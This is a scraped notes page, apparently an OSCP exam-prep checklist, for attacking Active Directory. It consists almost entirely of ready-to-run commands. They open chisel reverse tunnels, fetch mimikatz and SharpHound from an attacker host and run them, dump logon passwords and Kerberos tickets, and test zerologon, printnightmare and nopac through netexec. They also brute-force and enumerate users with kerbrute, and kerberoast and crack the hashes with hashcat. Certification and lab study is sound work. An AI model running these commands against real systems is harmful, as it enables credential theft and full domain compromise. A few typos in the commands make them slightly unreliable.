// notes/ Active Directory
🏛️
Checklist
Notes from oscp.adot8.com — active directory.
#active directory#adot8
source · oscp.adot8.com · active-directory/checklist ↗Checklist
code
01ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\{% hint style="warning" %} Do this for all users on the machine
Also run winPEAS to make sure no sensitive files are missed {% endhint %}
code
01.\chisel.exe client 192.168.45.x:8888 R:9999:socks02.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80code
01curl 192.168.45.x/SharpHound.exe -o SharpHound.exe02.\SharpHound.exe -c allcode
01curl 192.168.45.x/mimikatz.exe -o mimikatz.exe02.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"code
01.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"02dir *.kirbi03kerberos::ptt <ticket>code
01enum4linux <IP>02enum4linux -u -p -a -A <IP>code
01nmap -p 389 --script="ldap* and not brute" -Pn <IP>code
01 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"code
01 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i descriptioncode
01netexec smb <IP> -u '' -p '' --shares02netexec smb <IP> -u '' -p '' --users03netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups04netexec smb <IP> -u '' -p '' --rid-brute05netexec smb <IP> -u '' -p '' -M spider_plus06netexec smb <IP> -u '' -p '' -M printnightmare07netexec smb <IP> -u '' -p '' -M gpp_password08netexec smb <IP> -u '' -p '' -M spooler09netexec smb <IP> -u '' -p '' -M nopac10netexec smb <IP> -u '' -p '' -M zerologoncode
01smbmap -H <IP>02smbclient -L \\\\<IP>\\ -U '' -N code
01rpcclient -U '' -N <IP>02rpcclient -U "username%passwd" <IP> 03querydispinfo 04queryuser joe 05querygroup 0x44f 06querygroupmem 0x44f code
01kerbrute userenum -d pffsec.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.oscp.exam{% hint style="info" %} Try sorts of user:user combos, as-rep roasting, bruteforcing etc {% endhint %}
code
01kerbrute bruteuser -d offsec.lab ~/rockyou.txt w.smithcode
01impacket-GetUserSPNs oscp.exam/user:pass -dc-ip 192.168.1.129 -request02hashcat -m 13100 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -Ocode
01impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.4002impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-authcode
01bloodhound-python -d offsec.lab -u greg -p pass -ns 192.168.1.129 -c all